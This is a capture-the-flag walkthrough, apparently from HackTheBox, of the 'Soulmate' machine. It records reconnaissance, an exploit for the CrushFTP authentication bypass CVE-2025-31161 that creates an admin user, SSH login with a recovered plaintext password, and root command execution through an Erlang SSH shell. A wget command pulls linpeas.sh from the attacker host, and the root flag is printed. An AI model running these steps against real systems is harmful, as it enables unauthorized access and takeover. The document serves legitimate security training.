## https://sploitus.com/exploit?id=75EDCA9B-847D-5B76-A8D4-D3C3672B6DF3
# The-Challenge-Soulmate-
The "Soulmate" machine from HackTheBox is a capture-the-flag challenge. The goal is to find and exploit security weaknesses in two distinct phases
Initial Access: To get a foothold on the machine as a low-privilege user (in this case, the user ben).
Privilege Escalation: To elevate your privileges from that user to the root (administrator) account, giving you full control.
### Step 1: Initial Reconnaissance & Subdomain Enumeration
Our first step was to identify open ports and services on the machine at 10.10.11.86 using `nmap`.
```bash
$ sudo nmap -sV -sC 10.10.11.86
Starting Nmap 7.94SVN ( [https://nmap.org](https://nmap.org) ) at 2025-09-21 17:58 EEST
Nmap scan report for soulmate.htb (10.10.11.86)
Host is up (0.11s latency).
Not shown: 863 closed TCP ports (reset), 135 filtered TCP ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 1ubuntu1.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:d8:9d:49:4f (ECDSA)
| 256 64:ce:75:de:4a:e6:a5:84:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed.
Nmap done: 1 IP address (1 host up) scanned in 97.57 seconds
The scan revealed two open ports:
22/tcp: OpenSSH
80/tcp: nginx web server
Before exploring the web server, I used ffuf to check for hidden subdomains.
Bash
# ffuf -u [http://10.10.11.86](http://10.10.11.86) -H "Host: FUZZ.soulmate.htb" -w /path/to/wordlist.txt -fw 4
:: Method : GET
:: URL : [http://10.10.11.86](http://10.10.11.86)
:: Wordlist : FUZZ: /path/to/wordlist.txt
:: Header : Host: FUZZ.soulmate.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 4
This scan didn't immediately yield results. I added the main domain to my /etc/hosts file.
Bash
$ echo "10.10.11.86 soulmate.htb" | sudo tee -a /etc/hosts
Based on the machine name and common patterns, I tested the ftp.soulmate.htb subdomain and added it to /etc/hosts as well.
Bash
# echo "10.10.11.86 ftp.soulmate.htb" | sudo tee -a /etc/hosts
This was correct. Visiting http://ftp.soulmate.htb presented a login page for CrushFTP.
Step 2: Initial Access via CrushFTP Vulnerability
I examined the page's source code and found the software version: 11.w.657.
HTML
A search revealed this version is vulnerable to CVE-2025-31161, a critical authentication bypass that allows creating a new administrative user. I used an exploit script to create a new admin account.
Bash
# python3 exploit.py --target_host ftp.soulmate.htb --port 80 --target_user root --new_user test --password test123
[+] Preparing Payloads
[-] Warming up the target
[-] Target is up and running
[+] Sending Account Create Request
[+] User created successfully
[+] Exploit Complete you can now login with
[*] Username: test
[*] Password: test123
With the test:test123 credentials, I logged into the admin panel.
Inside the User Manager, I found an existing user named ben and was able to view his password.
Step 3: Gaining a User Shell
With the discovered password for ben, I attempted to connect via SSH on port 22.
Username: ben
Password: HouseHoldings998
Bash
$ ssh ben@10.10.11.86
ben@10.10.11.86's password:
Last login: Sun Sep 21 16:59:56 2025 from 10.10.14.71
ben@soulmate:~$
The connection was successful. I had a user shell and could read user.txt.
Step 4: Privilege Escalation to Root
The final step was to escalate privileges to root. The sudo command failed as expected.
Bash
ben@soulmate:~$ sudo su
[sudo] password for ben:
ben is not in the sudoers file. This incident will be reported.
I downloaded linpeas.sh to the target machine for enumeration.
Bash
# On attacker machine
$ python3 -m http.server 8000
# On target machine
ben@soulmate:/dev/shm$ wget [http://10.10.14.71:8000/linpeas.sh](http://10.10.14.71:8000/linpeas.sh) -O lin.sh
ben@soulmate:/dev/shm$ chmod +x lin.sh
ben@soulmate:/dev/shm$ ./lin.sh
LinPEAS revealed an interesting finding: an Erlang SSH service running on port 2222.
Since I already had valid credentials for ben, I tried to SSH into this service on localhost.
Bash
ben@soulmate:~$ ssh ben@localhost -p 2222
ben@localhost's password:
Eshell V15.2.5 (press Ctrl+G to abort, type help() for help)
(ssh_runner@soulmate)1>
This connected me to an Erlang shell. After some research, I found that the os:cmd/1 function can be used to execute system commands.
I verified my privileges by running id:
Erlang
(ssh_runner@soulmate)1> io:format("~s~n", [os:cmd("id")])
uid=0(root) gid=0(root) groups=0(root)
ok
I was root. I then read the final flag:
Erlang
(ssh_runner@soulmate)2> io:format("~s~n", [os:cmd("cat /root/root.txt")])
22b9d6466c3c0cde72f862dc5cdc6b0e
ok
(ssh_runner@soulmate)3>
---
## ๐ Extracted Text from All Images
As requested, here is the raw text extracted from all the embedded images in the PDF.
Click to view all extracted text
Page 1: Nmap Scan
(user@parrot)-[~]
$ sudo nmap -sV -sC 10.10.11.86
Starting Nmap 7.94SVN ( [https://nmap.org](https://nmap.org) ) at 2025-09-21 17:58 EEST
Nmap scan report for soulmate.htb (10.10.11.86)
Host is up (0.11s latency).
Not shown: 863 closed tcp ports (reset), 135 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 1ubuntu1.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:d8:9d:49:4f (ECDSA)
| 256 64:ce:75:de:4a:e6:a5:84:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
Nmap done: 1 IP address (1 host up) scanned in 97.57 seconds
user@parrot-[~]
$
Page 2: ffuf Scan
[root@parrot]-[/home/codix]
# ffuf -u [http://10.10.11.86](http://10.10.11.86) -H "Host: FUZZ.soulmate.htb" -w /home/codix/Desktop/subdomains-top1million-5000.txt -fw 4
/'__ \ /'__ \ /'__ \
/\ \ \ \ /\ \ \ \ /\ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \____ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \__ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \_\ \ \ __ \ \ \ \ \ __ \ \ \ \ \
\ \ \____/ / /__\ \ \ \ \ /__\ \ \ \ \
\ /_____/ \____/\ \_\ \ \____/\ \_\ \
\/_/ /_/ \/_/ /_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : [http://10.10.11.86](http://10.10.11.86)
:: Wordlist : FUZZ: /home/codix/Desktop/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.soulmate.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 4
________________________________________________
Page 4: Python Exploit
[root@parrot]-[/home/codix/Desktop]
# python3 exploit.py --target_host ftp.soulmate.htb --port 80 --target_user root --new_user test --password test123
[+] Preparing Payloads
[-] Warming up the target
[-] Target is up and running
[+] Sending Account Create Request
[+] User created successfully
[+] Exploit Complete you can now login with
[*] Username: test
[*] Password: test123
Page 6: wget linpeas.sh
www-data@soulmate:/dev/shm$ wget [http://10.10.14.71:8000/linpeas.sh](http://10.10.14.71:8000/linpeas.sh) -O lin.sh
--2025-09-21 16:49:32-- [http://10.10.14.71:8000/linpeas.sh](http://10.10.14.71:8000/linpeas.sh)
Connecting to 10.10.14.71:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 961834 (939K) [text/x-sh]
Saving to: 'lin.sh'
lin.sh 100%[===================>] 939.29K 333KB/s in 2.8s
2025-09-21 16:49:35 (333 KB/s) - 'lin.sh' saved [961834/961834]
www-data@soulmate:/dev/shm$
Page 7: Erlang Config Snippet
{auth_methods, "publickey, password"},
{user_passwords, [{"ben", "HouseHoldings998"}]},
{idle_time, infinity},
{max_channels, 10},
{max_sessions, 10},
{parallel_login, true}
]}
of
(ok, _Pid) ->
io:format("SSH daemon running on port 2222. Press Ctrl+C to exit.~n
(error, Reason) ->
io:format("Failed to start SSH daemon: ~p~n", [Reason])
end,
Page 7: Erlang Shell (Root)
(ssh_runner@soulmate)1> io:format("~s~n", [os:cmd("id")])
uid=0(root) gid=0(root) groups=0(root)
ok
(ssh_runner@soulmate)2> io:format("~s~n", [os:cmd("cat /root/root.txt")])
22b9d6466c3c0cde72f862dc5cdc6b0e
ok
(ssh_runner@soulmate)3>
---